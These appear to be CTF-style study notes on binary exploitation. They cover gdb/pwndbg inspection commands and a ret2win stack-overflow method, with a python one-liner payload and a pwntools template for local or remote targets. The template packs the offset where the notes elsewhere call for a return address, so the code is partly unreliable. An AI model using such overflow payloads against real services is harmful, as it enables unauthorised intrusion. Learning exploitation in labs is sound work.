Binary Exploitation

Investigating Binaries

• strings {binary} to see strings in the binary
• See what file type it is: file {binary}
• Check the security: checksec {binary}
• Within gdb:
  • Function information: info functions
  • Register information: info registers
  • Variable information: info variables
  • See 64 number of bytes after a register or memory address: x/64x ${register} or x/64x {address}
    • Useful if we set a breakpoint on a memory address with b *{address}

Ret-to-win

• We want to return to a different location in the binary by overwriting the stack
• We can find the offset necessary with cyclic
  • pwndbg {binary}
  • cyclic 100
  • run
    • then pass the cyclic payload
    • pwndbg will show what’s being returned to, which will be something like 0x4012ac <main+132> ret <0x6167616161666161>
  • Pass that offset back into cyclic with cyclic -l {offset} to find the offset before the payload
• Can then disas {desired function} to find the address of the function start and return
• Can then use python to craft a payload, in the form of offset + {desired_function_return} + {desired_function_start}
  • To get the bytes, use pwntools’ p64 like so: p64(0x401186), which returns it in the necessary format
  • python3 -c "import sys, struct; sys.stdout.buffer.write(b'A' * {} + b'\x27\x12\x40\x00\x00\x00\x00\x00' + b'\x86\x11\x40\x00\x00\x00\x00\x00')" | ./binary
• Can also use pwntools for automatic exploitation:

from pwn import *

# choose between local binary or remote service
# p = remote("{IP}", {port})
p = process("./{binary}")

payload = b'A' * {ret_offset}
payload += p64({ret_offset})
payload += p64({start_offset})
p.sendline(payload)
p.interactive()